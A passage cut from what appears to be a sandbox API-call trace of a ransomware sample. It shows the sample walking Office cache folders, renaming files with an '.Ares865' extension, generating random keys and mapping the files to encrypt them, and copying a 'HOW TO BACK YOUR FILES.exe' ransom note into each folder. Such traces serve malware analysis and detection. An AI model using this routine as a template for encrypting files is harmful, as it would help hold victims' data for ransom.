Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5fd4b580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fd4b580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0077.724] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.724] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.725] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.Ares865") returned 87 [0077.725] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.ares865"), dwFlags=0x1) returned 1 [0077.725] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.725] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=819) returned 1 [0077.726] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0077.726] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.726] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0077.728] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0077.729] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.729] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0077.730] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0077.730] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0077.731] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.731] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2624) returned 1 [0077.731] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0077.731] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.732] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0077.734] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0077.734] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.734] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0077.735] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us" [0077.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335108 | out: hHeap=0x2b0000) returned 1 [0077.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0077.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned 75 [0077.735] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us" [0077.735] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.735] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.754] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.754] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5fd97840, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fd97840, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0077.755] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.755] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.756] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.Ares865") returned 97 [0077.756] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.ares865"), dwFlags=0x1) returned 1 [0077.757] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0077.757] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1349) returned 1 [0077.758] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0077.760] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.760] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0077.761] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0xa4 [0077.899] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x190000 [0077.901] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0077.901] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.901] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0077.903] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.Ares865") returned 96 [0077.903] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.ares865"), dwFlags=0x1) returned 1 [0077.904] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0077.904] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=596341) returned 1 [0077.904] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0077.905] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.905] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0077.935] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0077.936] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.936] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0077.944] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C" [0077.944] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0628 | out: hHeap=0x2b0000) returned 1 [0077.944] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0077.944] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C") returned 62 [0077.944] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C" [0077.944] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.944] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.951] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.951] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5ff86a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ff86a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0077.952] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.952] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.952] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.Ares865") returned 83 [0077.952] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.ares865"), dwFlags=0x1) returned 1 [0077.953] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.953] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=596341) returned 1 [0077.953] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f06b0) returned 1 [0077.954] CryptGenRandom (in: hProv=0x2f06b0, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.954] CryptReleaseContext (hProv=0x2f06b0, dwFlags=0x0) returned 1 [0077.980] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f06b0) returned 1 [0077.981] CryptGenRandom (in: hProv=0x2f06b0, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.981] CryptReleaseContext (hProv=0x2f06b0, dwFlags=0x0) returned 1 [0077.989] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.Ares865") returned 84 [0077.989] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.ares865"), dwFlags=0x1) returned 1 [0077.990] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.990] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5557) returned 1 [0077.990] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f06b0) returned 1 [0077.991] CryptGenRandom (in: hProv=0x2f06b0, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.991] CryptReleaseContext (hProv=0x2f06b0, dwFlags=0x0) returned 1 [0077.993] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f06b0) returned 1 [0077.994] CryptGenRandom (in: hProv=0x2f06b0, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.994] CryptReleaseContext (hProv=0x2f06b0, dwFlags=0x0) returned 1 [0077.994] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.Ares865") returned 87 [0077.995] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.ares865"), dwFlags=0x1) returned 1 [0077.995] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.995] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=819) returned 1 [0077.996] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f06b0) returned 1 [0077.996] CryptGenRandom (in: hProv=0x2f06b0, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.996] CryptReleaseContext (hProv=0x2f06b0, dwFlags=0x0) returned 1 [0077.998] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f06b0) returned 1 [0077.999] CryptGenRandom (in: hProv=0x2f06b0, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.999] CryptReleaseContext (hProv=0x2f06b0, dwFlags=0x0) returned 1 [0078.000] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865") returned 80 [0078.000] MoveFileExW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0078.000] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.Ares865" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0078.000] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=9352) returned 1 [0078.001] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f06b0) returned 1 [0078.001] CryptGenRandom (in: hProv=0x2f06b0, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0078.001] CryptReleaseContext (hProv=0x2f06b0, dwFlags=0x0) returned 1 [0078.004] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f06b0) returned 1 [0078.005] CryptGenRandom (in: hProv=0x2f06b0, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0078.005] CryptReleaseContext (hProv=0x2f06b0, dwFlags=0x0) returned 1 [0078.005] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033" [0078.005] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0078.005] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0078.005] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033") returned 67 [0078.005] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033" [0078.005] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.005] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.009] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.009] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5fff8e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fff8e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.010] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.010] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.010] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C" [0078.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0738 | out: hHeap=0x2b0000) returned 1 [0078.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0078.010] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C") returned 62 [0078.010] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C" [0078.010] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.010] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0078.015] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.015] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6001efa0, 